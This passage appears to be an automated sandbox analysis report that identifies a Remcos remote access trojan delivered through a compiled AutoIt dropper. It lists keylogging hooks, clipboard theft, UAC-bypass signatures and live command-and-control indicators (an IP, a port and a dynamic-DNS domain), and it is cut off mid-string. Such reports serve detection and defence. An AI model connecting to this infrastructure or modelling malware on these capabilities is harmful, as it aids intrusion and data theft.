Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_00409253
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_0041C291
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0040C34D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_00409665
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0044E879 FindFirstFileExA,5_2_0044E879
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_0040880C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0040783C FindFirstFileW,FindNextFileW,5_2_0040783C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00419AF5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040BB30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040BD37
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409253
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C291
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C34D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409665
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0044E879 FindFirstFileExA,15_2_0044E879
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_0040880C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0040783C FindFirstFileW,FindNextFileW,15_2_0040783C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419AF5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD37
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_00407C97

          Networking

Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 23.94.53.100 2766
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 178.237.33.50 80
Source: Malware configuration extractor | URLs: yuahdgbceja.sytes.net
Source: global traffic | TCP traffic: 192.168.2.6:49707 -> 23.94.53.100:2766
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View | ASN Name: ATOM86-ASATOM86NL
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0018CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0018CE44
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: yuahdgbceja.sytes.net
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: svchost.exe, 0000000F.00000002.4490784851.0000000002E31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: deblaterate.exe, 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, deblaterate.exe, 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: svchost.exe, 0000000F.00000002.4490784851.0000000002E31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpD6
Source: svchost.exe, 00000005.00000002.4072031610.0000000002C31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: svchost.exe, 00000005.00000002.4072462611.0000000002C8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpal
Source: svchost.exe, 00000005.00000002.4072031610.0000000002C31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpll
Source: svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp~
Source: Amcache.hve.9.dr | String found in binary or memory: http://upx.sf.net

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000
          Source: C:\Windows\SysWOW64\svchost.exe | Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\svchost.exe
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0018EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0018ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_004EED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0018EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_0017AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
          Source: C:\Users\user\Desktop\GVV.exe | Code function: 0_2_001A9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe | Code function: 4_2_00509576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

          E-Banking Fraud

          Source: Yara match | File source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: deblaterate.exe PID: 5276, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: svchost.exe PID: 2248, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: deblaterate.exe PID: 1136, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: svchost.exe PID: 592, type: MEMORYSTR

          Spam, unwanted Advertisements and Ransom Demands

          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 5_2_0041C9E2 SystemParametersInfoW
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 15_2_0041C9E2 SystemParametersInfoW

          System Summary

          Source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: Process Memory Space: deblaterate.exe PID: 5276, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 2248, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: deblaterate.exe PID: 1136, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 592, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: GVV.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: GVV.exe, 00000000.00000000.2038475493.00000000001D2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_fcb6f643-2
          Source: GVV.exe, 00000000.00000000.2038475493.00000000001D2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d3ec8fa3-3
          Source: GVV.exe, 00000000.00000003.3863279691.0000000003861000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_707dde75-c
          Source: GVV.exe, 00000000.00000003.3863279691.0000000003861000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_20f5db58-5
          Source: deblaterate.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: deblaterate.exe, 00000004.00000002.3900615657.0000000000532000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_9bf06364-3
          Source: deblaterate.exe, 00000004.00000002.3900615657.0000000000532000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_275a1e1a-8
          Source: deblaterate.exe, 0000000E.00000000.4081505385.0000000000532000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_22b7e7e6-5
          Source: deblaterate.exe, 0000000E.00000000.4081505385.0000000000532000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8df6bed2-6
          Source: GVV.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_48f4790b-8
          Source: GVV.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhala